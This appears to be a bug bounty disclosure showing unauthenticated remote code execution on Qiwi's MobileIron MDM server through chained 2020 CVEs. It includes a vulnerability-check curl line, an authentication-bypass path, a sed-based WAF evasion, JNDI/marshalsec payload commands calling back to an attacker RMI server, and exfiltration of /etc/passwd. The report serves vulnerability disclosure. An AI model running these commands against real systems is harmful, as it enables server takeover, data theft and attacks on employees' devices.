Last week, details about 3 CVEs affecting MobileIron MDM product were disclosed. When combined, an attacker can achieve unauthenticated remote code execution with arbitrary Java deserialization vector : - CVE-2020-15505 - Remote Code Execution - CVE-2020-15506 - Authentication Bypass - CVE-2020-15507 - Arbitrary File Reading
The following blog post discloses the issues: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html The following github repo is a working PoC to reproduce the issues : https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 Advisory from vendor can be found here : https://www.mobileiron.com/en/blog/mobileiron-security-updates-available
Code execution is achieved by arbitrary deserialization in Java with Hessian protocol. The /mifs/services/LogService endpoint does such deserialization. Authentication is required by it can be bypassed with /.;/ (/mifs/.;/services/LogService)
By using the following check to determine is a host if vulnerable
curl "<HOST>/mifs/.;/services/LogService" -k -s | grep -q 'This method/operation is not allowed.' && echo "<HOST> - Vulnerable"
I've discovered that mdm.qiwi.com is vulnerable. The MDM User enrollment interface is reachable on https://mdm.qiwi.com F990294
A WAF is protecting this host and thus blocking out of the box exploit code. It matches and blocks requests containing essential java classes strings contained in the serialized object like java.lang / java.io / java.util : F990300 F990301
The exploitation uses the code hosted on the following repo : https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 The steps are mostly identical. This exploit uses a JNDI-based attack with a RMI server running on my VPS.
The final JNDI exploit contains only one string that triggers the WAF : java.util F990309
I've managed to bypass the WAF without breaking the exploit code by replacing it by javb.util F990356
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C <COMMAND>
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<VPS_IP>/<REFERENCE> | sed -b 's/java\.util/javb.util/' > exp_rmi_qiwi
python hessian.py -u "https://mdm.qiwi.com/mifs/.;/services/LogService" -p exp_rmi_qiwi
Here are some proofs of my exploitation attemps to validate effective RCE : - Simple curl ping back
Curl leaking /etc/passwd F990327 F990328
Curl leaking /etc/resolv.conf F990330 F990331 F990332
The curl user-agent is
curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
And requests came from IP
Since we are exploiting /mifs/ interface all commands are executed as tomcat. If we happen to exploit Management interface (/mics/) through this vulnerability, the commands may be executed by root user (depending of the version of MobileIron)
By executing arbitrary commands on the server, an attacker can compromise the integrity, availability and confidentiality of the data of the server and also pivot onto other servers on the internal network.
Since this server is running a MDM product, an attacker can compromise it to attack Qiwi employees and/or compromise their mobile devices.